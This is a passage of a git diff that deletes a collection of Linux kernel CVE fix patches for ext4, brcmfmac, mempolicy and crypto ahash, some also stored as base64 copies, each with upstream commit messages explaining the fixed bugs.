pYWwgY2FzZSBzaW5jZSB0aGUgb3ZlcmhlYWQgaXMgcHJldHR5Cmxvdy4gSW4gY2FzZSB0aGlzIGlzIG9ic2VydmVkIHRvIGJlIGEgcGVyZm9ybWFuY2UgcHJvYmxlbSB3ZSBjYW4gYWx3YXlzCmhhbmRsZSBpdCB1c2luZyBhIHNwZWNpYWwgZmxhZyB0byBleHQ0X21hcF9ibG9ja3MoKS4KCkNoYW5nZS1JZDogSTlmOGIzNzFjOWZkNzE2YmYzZDhhZjM3ODBjZTQzZTczZDgwY2ZiMjgKRml4ZXM6IGYzYjU5MjkxYTY5ZDBiNzM0YmUxZmM4YmU0ODlmZWYyZGQ4NDZkM2QKUmVwb3J0ZWQtYnk6ICJIVUFORyBXZWxsZXIgKENNL0VTVzEyLUNOKSIgPFdlbGxlci5IdWFuZ0Bjbi5ib3NjaC5jb20+ClRlc3RlZC1ieTogIkhVQU5HIFdlbGxlciAoQ00vRVNXMTItQ04pIiA8V2VsbGVyLkh1YW5nQGNuLmJvc2NoLmNvbT4KU2lnbmVkLW9mZi1ieTogSmFuIEthcmEgPGphY2tAc3VzZS5jej4KU2lnbmVkLW9mZi1ieTogVGhlb2RvcmUgVHMnbyA8dHl0c29AbWl0LmVkdT4KW2J3aDogQmFja3BvcnRlZCB0byAzLjE2OgogLSBEcm9wIGNoZWNrIGZvciBFWFQ0X0dFVF9CTE9DS1NfWkVSTyBmbGFnCiAtIEFkanVzdCBjb250ZXh0XQpTaWduZWQtb2ZmLWJ5OiBCZW4gSHV0Y2hpbmdzIDxiZW5AZGVjYWRlbnQub3JnLnVrPgotLS0KCmRpZmYgLS1naXQgYS9mcy9leHQ0L2lub2RlLmMgYi9mcy9leHQ0L2lub2RlLmMKaW5kZXggOWQzNThkYy4uZjQ3MmFlZCAxMDA2NDQKLS0tIGEvZnMvZXh0NC9pbm9kZS5jCisrKyBiL2ZzL2V4dDQvaW5vZGUuYwpAQCAtNjYxLDYgKzY2MSwyMCBAQAogCQlyZXQgPSBjaGVja19ibG9ja192YWxpZGl0eShpbm9kZSwgbWFwKTsKIAkJaWYgKHJldCAhPSAwKQogCQkJcmV0dXJuIHJldDsKKworCQkvKgorCQkgKiBJbm9kZXMgd2l0aCBmcmVzaGx5IGFsbG9jYXRlZCBibG9ja3Mgd2hlcmUgY29udGVudHMgd2lsbCBiZQorCQkgKiB2aXNpYmxlIGFmdGVyIHRyYW5zYWN0aW9uIGNvbW1pdCBtdXN0IGJlIG9uIHRyYW5zYWN0aW9uJ3MKKwkJICogb3JkZXJlZCBkYXRhIGxpc3QuCisJCSAqLworCQlpZiAobWFwLT5tX2ZsYWdzICYgRVhUNF9NQVBfTkVXICYmCisJCSAgICAhKG1hcC0+bV9mbGFncyAmIEVYVDRfTUFQX1VOV1JJVFRFTikgJiYKKwkJICAgICFJU19OT1FVT1RBKGlub2RlKSAmJgorCQkgICAgZXh0NF9zaG91bGRfb3JkZXJfZGF0YShpbm9kZSkpIHsKKwkJCXJldCA9IGV4dDRfamJkMl9maWxlX2lub2RlKGhhbmRsZSwgaW5vZGUpOworCQkJaWYgKHJldCkKKwkJCQlyZXR1cm4gcmV0OworCQl9CiAJfQogCXJldHVybiByZXR2YWw7CiB9CkBAIC0xMTE2LDE1ICsxMTMwLDYgQEAKIAlpbnQgaV9zaXplX2NoYW5nZWQgPSAwOwogCiAJdHJhY2VfZXh0NF93cml0ZV9lbmQoaW5vZGUsIHBvcywgbGVuLCBjb3BpZWQpOwotCWlmIChleHQ0X3Rlc3RfaW5vZGVfc3RhdGUoaW5vZGUsIEVYVDRfU1RBVEVfT1JERVJFRF9NT0RFKSkgewotCQlyZXQgPSBleHQ0X2piZDJfZmlsZV9pbm9kZShoYW5kbGUsIGlub2RlKTsKLQkJaWYgKHJldCkgewotCQkJdW5sb2NrX3BhZ2UocGFnZSk7Ci0JCQlwYWdlX2NhY2hlX3JlbGVhc2UocGFnZSk7Ci0JCQlnb3RvIGVycm91dDsKLQkJfQotCX0KLQogCWlmIChleHQ0X2hhc19pbmxpbmVfZGF0YShpbm9kZSkpIHsKIAkJcmV0ID0gZXh0NF93cml0ZV9pbmxpbmVfZGF0YV9lbmQoaW5vZGUsIHBvcywgbGVuLAogCQkJCQkJIGNvcGllZCwgcGFnZSk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch
deleted file mode 100644
index b56d5a52..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From df6099279dc346ec77158d5f52d3176dbd0a1e4c Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Mon, 04 Jul 2016 10:14:01 -0400
-Subject: [PATCH] ext4: fix deadlock during page writeback
-
-[ Upstream commit 646caa9c8e196880b41cd3e3d33a2ebc752bdb85 ]
-
-Commit 06bd3c36a733 (ext4: fix data exposure after a crash) uncovered a
-deadlock in ext4_writepages() which was previously much harder to hit.
-After this commit xfstest generic/130 reproduces the deadlock on small
-filesystems.
-
-The problem happens when ext4_do_update_inode() sets LARGE_FILE feature
-and marks current inode handle as synchronous. That subsequently results
-in ext4_journal_stop() called from ext4_writepages() to block waiting for
-transaction commit while still holding page locks, reference to io_end,
-and some prepared bio in mpd structure each of which can possibly block
-transaction commit from completing and thus results in deadlock.
-
-Fix the problem by releasing page locks, io_end reference, and
-submitting prepared bio before calling ext4_journal_stop().
-
-[ Changed to defer the call to ext4_journal_stop() only if the handle
-  is synchronous.  --tytso ]
-
-Change-Id: I724640d96ffaa03e512cd0b48cea056b4030c382
-Reported-and-tested-by: Eryu Guan <eguan@redhat.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-CC: stable@vger.kernel.org
-Signed-off-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Sasha Levin <alexander.levin@verizon.com>
----
-
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index f472aed..5aa499f 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -2554,13 +2554,36 @@
- 				done = true;
- 			}
- 		}
--		ext4_journal_stop(handle);
-+		/*
-+		 * Caution: If the handle is synchronous,
-+		 * ext4_journal_stop() can wait for transaction commit
-+		 * to finish which may depend on writeback of pages to
-+		 * complete or on page lock to be released.  In that
-+		 * case, we have to wait until after after we have
-+		 * submitted all the IO, released page locks we hold,
-+		 * and dropped io_end reference (for extent conversion
-+		 * to be able to complete) before stopping the handle.
-+		 */
-+		if (!ext4_handle_valid(handle) || handle->h_sync == 0) {
-+			ext4_journal_stop(handle);
-+			handle = NULL;
-+		}
- 		/* Submit prepared bio */
- 		ext4_io_submit(&mpd.io_submit);
- 		/* Unlock pages we didn't use */
- 		mpage_release_unused_pages(&mpd, give_up_on_write);
--		/* Drop our io_end reference we got from init */
--		ext4_put_io_end(mpd.io_submit.io_end);
-+		/*
-+		 * Drop our io_end reference we got from init. We have
-+		 * to be careful and use deferred io_end finishing if
-+		 * we are still holding the transaction as we can
-+		 * release the last reference to io_end which may end
-+		 * up doing unwritten extent conversion.
-+		 */
-+		if (handle) {
-+			ext4_put_io_end_defer(mpd.io_submit.io_end);
-+			ext4_journal_stop(handle);
-+		} else
-+			ext4_put_io_end(mpd.io_submit.io_end);
- 
- 		if (ret == -ENOSPC && sbi->s_journal) {
- 			/*
diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64
deleted file mode 100644
index 70d51e63..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBkZjYwOTkyNzlkYzM0NmVjNzcxNThkNWY1MmQzMTc2ZGJkMGExZTRjIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBKYW4gS2FyYSA8amFja0BzdXNlLmN6PgpEYXRlOiBNb24sIDA0IEp1bCAyMDE2IDEwOjE0OjAxIC0wNDAwClN1YmplY3Q6IFtQQVRDSF0gZXh0NDogZml4IGRlYWRsb2NrIGR1cmluZyBwYWdlIHdyaXRlYmFjawoKWyBVcHN0cmVhbSBjb21taXQgNjQ2Y2FhOWM4ZTE5Njg4MGI0MWNkM2UzZDMzYTJlYmM3NTJiZGI4NSBdCgpDb21taXQgMDZiZDNjMzZhNzMzIChleHQ0OiBmaXggZGF0YSBleHBvc3VyZSBhZnRlciBhIGNyYXNoKSB1bmNvdmVyZWQgYQpkZWFkbG9jayBpbiBleHQ0X3dyaXRlcGFnZXMoKSB3aGljaCB3YXMgcHJldmlvdXNseSBtdWNoIGhhcmRlciB0byBoaXQuCkFmdGVyIHRoaXMgY29tbWl0IHhmc3Rlc3QgZ2VuZXJpYy8xMzAgcmVwcm9kdWNlcyB0aGUgZGVhZGxvY2sgb24gc21hbGwKZmlsZXN5c3RlbXMuCgpUaGUgcHJvYmxlbSBoYXBwZW5zIHdoZW4gZXh0NF9kb191cGRhdGVfaW5vZGUoKSBzZXRzIExBUkdFX0ZJTEUgZmVhdHVyZQphbmQgbWFya3MgY3VycmVudCBpbm9kZSBoYW5kbGUgYXMgc3luY2hyb25vdXMuIFRoYXQgc3Vic2VxdWVudGx5IHJlc3VsdHMKaW4gZXh0NF9qb3VybmFsX3N0b3AoKSBjYWxsZWQgZnJvbSBleHQ0X3dyaXRlcGFnZXMoKSB0byBibG9jayB3YWl0aW5nIGZvcgp0cmFuc2FjdGlvbiBjb21taXQgd2hpbGUgc3RpbGwgaG9sZGluZyBwYWdlIGxvY2tzLCByZWZlcmVuY2UgdG8gaW9fZW5kLAphbmQgc29tZSBwcmVwYXJlZCBiaW8gaW4gbXBkIHN0cnVjdHVyZSBlYWNoIG9mIHdoaWNoIGNhbiBwb3NzaWJseSBibG9jawp0cmFuc2FjdGlvbiBjb21taXQgZnJvbSBjb21wbGV0aW5nIGFuZCB0aHVzIHJlc3VsdHMgaW4gZGVhZGxvY2suCgpGaXggdGhlIHByb2JsZW0gYnkgcmVsZWFzaW5nIHBhZ2UgbG9ja3MsIGlvX2VuZCByZWZlcmVuY2UsIGFuZApzdWJtaXR0aW5nIHByZXBhcmVkIGJpbyBiZWZvcmUgY2FsbGluZyBleHQ0X2pvdXJuYWxfc3RvcCgpLgoKWyBDaGFuZ2VkIHRvIGRlZmVyIHRoZSBjYWxsIHRvIGV4dDRfam91cm5hbF9zdG9wKCkgb25seSBpZiB0aGUgaGFuZGxlCiAgaXMgc3luY2hyb25vdXMuICAtLXR5dHNvIF0KCkNoYW5nZS1JZDogSTcyNDY0MGQ5NmZmYWEwM2U1MTJjZDBiNDhjZWEwNTZiNDAzMGMzODIKUmVwb3J0ZWQtYW5kLXRlc3RlZC1ieTogRXJ5dSBHdWFuIDxlZ3VhbkByZWRoYXQuY29tPgpTaWduZWQtb2ZmLWJ5OiBUaGVvZG9yZSBUcydvIDx0eXRzb0BtaXQuZWR1PgpDQzogc3RhYmxlQHZnZXIua2VybmVsLm9yZwpTaWduZWQtb2ZmLWJ5OiBKYW4gS2FyYSA8amFja0BzdXNlLmN6PgpTaWduZWQtb2ZmLWJ5OiBTYXNoYSBMZXZpbiA8YWxleGFuZGVyLmxldmluQHZlcml6b24uY29tPgotLS0KCmRpZmYgLS1naXQgYS9mcy9leHQ0L2lub2RlLmMgYi9mcy9leHQ0L2lub2RlLmMKaW5kZXggZjQ3MmFlZC4uNWFhNDk5ZiAxMDA2NDQKLS0tIGEvZnMvZXh0NC9pbm9kZS5jCisrKyBiL2ZzL2V4dDQvaW5vZGUuYwpAQCAtMjU1NCwxMyArMjU1NCwzNiBAQAogCQkJCWRvbmUgPSB0cnVlOwogCQkJfQogCQl9Ci0JCWV4dDRfam91cm5hbF9zdG9wKGhhbmRsZSk7CisJCS8qCisJCSAqIENhdXRpb246IElmIHRoZSBoYW5kbGUgaXMgc3luY2hyb25vdXMsCisJCSAqIGV4dDRfam91cm5hbF9zdG9wKCkgY2FuIHdhaXQgZm9yIHRyYW5zYWN0aW9uIGNvbW1pdAorCQkgKiB0byBmaW5pc2ggd2hpY2ggbWF5IGRlcGVuZCBvbiB3cml0ZWJhY2sgb2YgcGFnZXMgdG8KKwkJICogY29tcGxldGUgb3Igb24gcGFnZSBsb2NrIHRvIGJlIHJlbGVhc2VkLiAgSW4gdGhhdAorCQkgKiBjYXNlLCB3ZSBoYXZlIHRvIHdhaXQgdW50aWwgYWZ0ZXIgYWZ0ZXIgd2UgaGF2ZQorCQkgKiBzdWJtaXR0ZWQgYWxsIHRoZSBJTywgcmVsZWFzZWQgcGFnZSBsb2NrcyB3ZSBob2xkLAorCQkgKiBhbmQgZHJvcHBlZCBpb19lbmQgcmVmZXJlbmNlIChmb3IgZXh0ZW50IGNvbnZlcnNpb24KKwkJICogdG8gYmUgYWJsZSB0byBjb21wbGV0ZSkgYmVmb3JlIHN0b3BwaW5nIHRoZSBoYW5kbGUuCisJCSAqLworCQlpZiAoIWV4dDRfaGFuZGxlX3ZhbGlkKGhhbmRsZSkgfHwgaGFuZGxlLT5oX3N5bmMgPT0gMCkgeworCQkJZXh0NF9qb3VybmFsX3N0b3AoaGFuZGxlKTsKKwkJCWhhbmRsZSA9IE5VTEw7CisJCX0KIAkJLyogU3VibWl0IHByZXBhcmVkIGJpbyAqLwogCQlleHQ0X2lvX3N1Ym1pdCgmbXBkLmlvX3N1Ym1pdCk7CiAJCS8qIFVubG9jayBwYWdlcyB3ZSBkaWRuJ3QgdXNlICovCiAJCW1wYWdlX3JlbGVhc2VfdW51c2VkX3BhZ2VzKCZtcGQsIGdpdmVfdXBfb25fd3JpdGUpOwotCQkvKiBEcm9wIG91ciBpb19lbmQgcmVmZXJlbmNlIHdlIGdvdCBmcm9tIGluaXQgKi8KLQkJZXh0NF9wdXRfaW9fZW5kKG1wZC5pb19zdWJtaXQuaW9fZW5kKTsKKwkJLyoKKwkJICogRHJvcCBvdXIgaW9fZW5kIHJlZmVyZW5jZSB3ZSBnb3QgZnJvbSBpbml0LiBXZSBoYXZlCisJCSAqIHRvIGJlIGNhcmVmdWwgYW5kIHVzZSBkZWZlcnJlZCBpb19lbmQgZmluaXNoaW5nIGlmCisJCSAqIHdlIGFyZSBzdGlsbCBob2xkaW5nIHRoZSB0cmFuc2FjdGlvbiBhcyB3ZSBjYW4KKwkJICogcmVsZWFzZSB0aGUgbGFzdCByZWZlcmVuY2UgdG8gaW9fZW5kIHdoaWNoIG1heSBlbmQKKwkJICogdXAgZG9pbmcgdW53cml0dGVuIGV4dGVudCBjb252ZXJzaW9uLgorCQkgKi8KKwkJaWYgKGhhbmRsZSkgeworCQkJZXh0NF9wdXRfaW9fZW5kX2RlZmVyKG1wZC5pb19zdWJtaXQuaW9fZW5kKTsKKwkJCWV4dDRfam91cm5hbF9zdG9wKGhhbmRsZSk7CisJCX0gZWxzZQorCQkJZXh0NF9wdXRfaW9fZW5kKG1wZC5pb19zdWJtaXQuaW9fZW5kKTsKIAogCQlpZiAocmV0ID09IC1FTk9TUEMgJiYgc2JpLT5zX2pvdXJuYWwpIHsKIAkJCS8qCg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch b/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch
deleted file mode 100644
index d501826e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 06bd3c36a733ac27962fea7d6f47168841376824 Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Sun, 24 Apr 2016 00:56:03 -0400
-Subject: ext4: fix data exposure after a crash
-
-Huang has reported that in his powerfail testing he is seeing stale
-block contents in some of recently allocated blocks although he mounts
-ext4 in data=ordered mode. After some investigation I have found out
-that indeed when delayed allocation is used, we don't add inode to
-transaction's list of inodes needing flushing before commit. Originally
-we were doing that but commit f3b59291a69d removed the logic with a
-flawed argument that it is not needed.
-
-The problem is that although for delayed allocated blocks we write their
-contents immediately after allocating them, there is no guarantee that
-the IO scheduler or device doesn't reorder things and thus transaction
-allocating blocks and attaching them to inode can reach stable storage
-before actual block contents. Actually whenever we attach freshly
-allocated blocks to inode using a written extent, we should add inode to
-transaction's ordered inode list to make sure we properly wait for block
-contents to be written before committing the transaction. So that is
-what we do in this patch. This also handles other cases where stale data
-exposure was possible - like filling hole via mmap in
-data=ordered,nodelalloc mode.
-
-The only exception to the above rule are extending direct IO writes where
-blkdev_direct_IO() waits for IO to complete before increasing i_size and
-thus stale data exposure is not possible. For now we don't complicate
-the code with optimizing this special case since the overhead is pretty
-low. In case this is observed to be a performance problem we can always
-handle it using a special flag to ext4_map_blocks().
-
-CC: stable@vger.kernel.org
-Fixes: f3b59291a69d0b734be1fc8be489fef2dd846d3d
-Reported-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
-Tested-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
-Signed-off-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
----
- fs/ext4/inode.c | 24 +++++++++++++++---------
- 1 file changed, 15 insertions(+), 9 deletions(-)
-
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index 981a1fc..250c2df 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -684,6 +684,21 @@ out_sem:
- 		ret = check_block_validity(inode, map);
- 		if (ret != 0)
- 			return ret;
-+
-+		/*
-+		 * Inodes with freshly allocated blocks where contents will be
-+		 * visible after transaction commit must be on transaction's
-+		 * ordered data list.
-+		 */
-+		if (map->m_flags & EXT4_MAP_NEW &&
-+		    !(map->m_flags & EXT4_MAP_UNWRITTEN) &&
-+		    !(flags & EXT4_GET_BLOCKS_ZERO) &&
-+		    !IS_NOQUOTA(inode) &&
-+		    ext4_should_order_data(inode)) {
-+			ret = ext4_jbd2_file_inode(handle, inode);
-+			if (ret)
-+				return ret;
-+		}
- 	}
- 	return retval;
- }
-@@ -1289,15 +1304,6 @@ static int ext4_write_end(struct file *file,
- 	int i_size_changed = 0;
- 
- 	trace_ext4_write_end(inode, pos, len, copied);
--	if (ext4_test_inode_state(inode, EXT4_STATE_ORDERED_MODE)) {
--		ret = ext4_jbd2_file_inode(handle, inode);
--		if (ret) {
--			unlock_page(page);
--			put_page(page);
--			goto errout;
--		}
--	}
--
- 	if (ext4_has_inline_data(inode)) {
- 		ret = ext4_write_inline_data_end(inode, pos, len,
- 						 copied, page);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch
deleted file mode 100644
index 8f982048..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 7136ca73ff3496758b56f60b6fe76d675e69cd21 Mon Sep 17 00:00:00 2001
-From: Arend van Spriel <arend.vanspriel@broadcom.com>
-Date: Fri, 7 Jul 2017 21:09:06 +0100
-Subject: brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-commit 8f44c9a41386729fea410e688959ddaa9d51be7c upstream.
-
-The lower level nl80211 code in cfg80211 ensures that "len" is between
-25 and NL80211_ATTR_FRAME (2304).  We subtract DOT11_MGMT_HDR_LEN (24) from
-"len" so thats's max of 2280.  However, the action_frame->data[] buffer is
-only BRCMF_FIL_ACTION_FRAME_SIZE (1800) bytes long so this memcpy() can
-overflow.
-
-	memcpy(action_frame->data, &buf[DOT11_MGMT_HDR_LEN],
-	       le16_to_cpu(action_frame->len));
-
-Cc: stable@vger.kernel.org # 3.9.x
-Fixes: 18e2f61db3b70 ("brcmfmac: P2P action frame tx.")
-Reported-by: "freenerguo(郭大兴)" <freenerguo@tencent.com>
-Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[wt: s/cfg80211.c/wl_cfg80211.c in 3.10]
-
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
-index 2c52430..8afb609 100644
---- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
-+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
-@@ -4019,6 +4019,11 @@ brcmf_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev,
- 		cfg80211_mgmt_tx_status(wdev, *cookie, buf, len, true,
- 					GFP_KERNEL);
- 	} else if (ieee80211_is_action(mgmt->frame_control)) {
-+		if (len > BRCMF_FIL_ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN) {
-+			brcmf_err("invalid action frame length\n");
-+			err = -EINVAL;
-+			goto exit;
-+		}
- 		af_params = kzalloc(sizeof(*af_params), GFP_KERNEL);
- 		if (af_params == NULL) {
- 			brcmf_err("unable to allocate frame\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch b/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch
deleted file mode 100644
index 33661483..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8f44c9a41386729fea410e688959ddaa9d51be7c Mon Sep 17 00:00:00 2001
-From: Arend van Spriel <arend.vanspriel@broadcom.com>
-Date: Fri, 7 Jul 2017 21:09:06 +0100
-Subject: brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The lower level nl80211 code in cfg80211 ensures that "len" is between
-25 and NL80211_ATTR_FRAME (2304).  We subtract DOT11_MGMT_HDR_LEN (24) from
-"len" so thats's max of 2280.  However, the action_frame->data[] buffer is
-only BRCMF_FIL_ACTION_FRAME_SIZE (1800) bytes long so this memcpy() can
-overflow.
-
-	memcpy(action_frame->data, &buf[DOT11_MGMT_HDR_LEN],
-	       le16_to_cpu(action_frame->len));
-
-Cc: stable@vger.kernel.org # 3.9.x
-Fixes: 18e2f61db3b70 ("brcmfmac: P2P action frame tx.")
-Reported-by: "freenerguo(郭大兴)" <freenerguo@tencent.com>
-Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
-index dcde596..7e689c8 100644
---- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
-+++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
-@@ -4934,6 +4934,11 @@ brcmf_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev,
- 		cfg80211_mgmt_tx_status(wdev, *cookie, buf, len, true,
- 					GFP_KERNEL);
- 	} else if (ieee80211_is_action(mgmt->frame_control)) {
-+		if (len > BRCMF_FIL_ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN) {
-+			brcmf_err("invalid action frame length\n");
-+			err = -EINVAL;
-+			goto exit;
-+		}
- 		af_params = kzalloc(sizeof(*af_params), GFP_KERNEL);
- 		if (af_params == NULL) {
- 			brcmf_err("unable to allocate frame\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch
deleted file mode 100644
index 97b6ec6f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From cf01fb9985e8deb25ccf0ea54d916b8871ae0e62 Mon Sep 17 00:00:00 2001
-From: Chris Salls <salls@cs.ucsb.edu>
-Date: Fri, 7 Apr 2017 23:48:11 -0700
-Subject: mm/mempolicy.c: fix error handling in set_mempolicy and mbind.
-
-In the case that compat_get_bitmap fails we do not want to copy the
-bitmap to the user as it will contain uninitialized stack data and leak
-sensitive data.
-
-Signed-off-by: Chris Salls <salls@cs.ucsb.edu>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- mm/mempolicy.c | 20 ++++++++------------
- 1 file changed, 8 insertions(+), 12 deletions(-)
-
-diff --git a/mm/mempolicy.c b/mm/mempolicy.c
-index 75b2745..37d0b33 100644
---- a/mm/mempolicy.c
-+++ b/mm/mempolicy.c
-@@ -1529,7 +1529,6 @@ COMPAT_SYSCALL_DEFINE5(get_mempolicy, int __user *, policy,
- COMPAT_SYSCALL_DEFINE3(set_mempolicy, int, mode, compat_ulong_t __user *, nmask,
- 		       compat_ulong_t, maxnode)
- {
--	long err = 0;
- 	unsigned long __user *nm = NULL;
- 	unsigned long nr_bits, alloc_size;
- 	DECLARE_BITMAP(bm, MAX_NUMNODES);
-@@ -1538,14 +1537,13 @@ COMPAT_SYSCALL_DEFINE3(set_mempolicy, int, mode, compat_ulong_t __user *, nmask,
- 	alloc_size = ALIGN(nr_bits, BITS_PER_LONG) / 8;
- 
- 	if (nmask) {
--		err = compat_get_bitmap(bm, nmask, nr_bits);
-+		if (compat_get_bitmap(bm, nmask, nr_bits))
-+			return -EFAULT;
- 		nm = compat_alloc_user_space(alloc_size);
--		err |= copy_to_user(nm, bm, alloc_size);
-+		if (copy_to_user(nm, bm, alloc_size))
-+			return -EFAULT;
- 	}
- 
--	if (err)
--		return -EFAULT;
--
- 	return sys_set_mempolicy(mode, nm, nr_bits+1);
- }
- 
-@@ -1553,7 +1551,6 @@ COMPAT_SYSCALL_DEFINE6(mbind, compat_ulong_t, start, compat_ulong_t, len,
- 		       compat_ulong_t, mode, compat_ulong_t __user *, nmask,
- 		       compat_ulong_t, maxnode, compat_ulong_t, flags)
- {
--	long err = 0;
- 	unsigned long __user *nm = NULL;
- 	unsigned long nr_bits, alloc_size;
- 	nodemask_t bm;
-@@ -1562,14 +1559,13 @@ COMPAT_SYSCALL_DEFINE6(mbind, compat_ulong_t, start, compat_ulong_t, len,
- 	alloc_size = ALIGN(nr_bits, BITS_PER_LONG) / 8;
- 
- 	if (nmask) {
--		err = compat_get_bitmap(nodes_addr(bm), nmask, nr_bits);
-+		if (compat_get_bitmap(nodes_addr(bm), nmask, nr_bits))
-+			return -EFAULT;
- 		nm = compat_alloc_user_space(alloc_size);
--		err |= copy_to_user(nm, nodes_addr(bm), alloc_size);
-+		if (copy_to_user(nm, nodes_addr(bm), alloc_size))
-+			return -EFAULT;
- 	}
- 
--	if (err)
--		return -EFAULT;
--
- 	return sys_mbind(start, len, mode, nm, nr_bits+1, flags);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch
deleted file mode 100644
index a384a909..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch
+++ /dev/null
@@ -1,234 +0,0 @@
-From c2798145e731005fa1e6ee2a489940c1dd8f03e4 Mon Sep 17 00:00:00 2001
-From: Herbert Xu <herbert@gondor.apana.org.au>
-Date: Mon, 10 Apr 2017 17:27:57 +0800
-Subject: crypto: ahash - Fix EINPROGRESS notification callback
-
-commit ef0579b64e93188710d48667cb5e014926af9f1b upstream.
-
-The ahash API modifies the request's callback function in order
-to clean up after itself in some corner cases (unaligned final
-and missing finup).
-
-When the request is complete ahash will restore the original
-callback and everything is fine.  However, when the request gets
-an EBUSY on a full queue, an EINPROGRESS callback is made while
-the request is still ongoing.
-
-In this case the ahash API will incorrectly call its own callback.
-
-This patch fixes the problem by creating a temporary request
-object on the stack which is used to relay EINPROGRESS back to
-the original completion function.
-
-This patch also adds code to preserve the original flags value.
-
-Fixes: ab6bf4e5e5e4 ("crypto: hash - Fix the pointer voodoo in...")
-Reported-by: Sabrina Dubroca <sd@queasysnail.net>
-Tested-by: Sabrina Dubroca <sd@queasysnail.net>
-Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- crypto/ahash.c                 | 79 ++++++++++++++++++++++++++----------------
- include/crypto/internal/hash.h | 10 ++++++
- 2 files changed, 60 insertions(+), 29 deletions(-)
-
-diff --git a/crypto/ahash.c b/crypto/ahash.c
-index 46ab909..a11220e 100644
---- a/crypto/ahash.c
-+++ b/crypto/ahash.c
-@@ -31,6 +31,7 @@ struct ahash_request_priv {
- 	crypto_completion_t complete;
- 	void *data;
- 	u8 *result;
-+	u32 flags;
- 	void *ubuf[] CRYPTO_MINALIGN_ATTR;
- };
- 
-@@ -269,6 +270,8 @@ static int ahash_save_req(struct ahash_request *req, crypto_completion_t cplt)
- 	priv->result = req->result;
- 	priv->complete = req->base.complete;
- 	priv->data = req->base.data;
-+	priv->flags = req->base.flags;
-+
- 	/*
- 	 * WARNING: We do not backup req->priv here! The req->priv
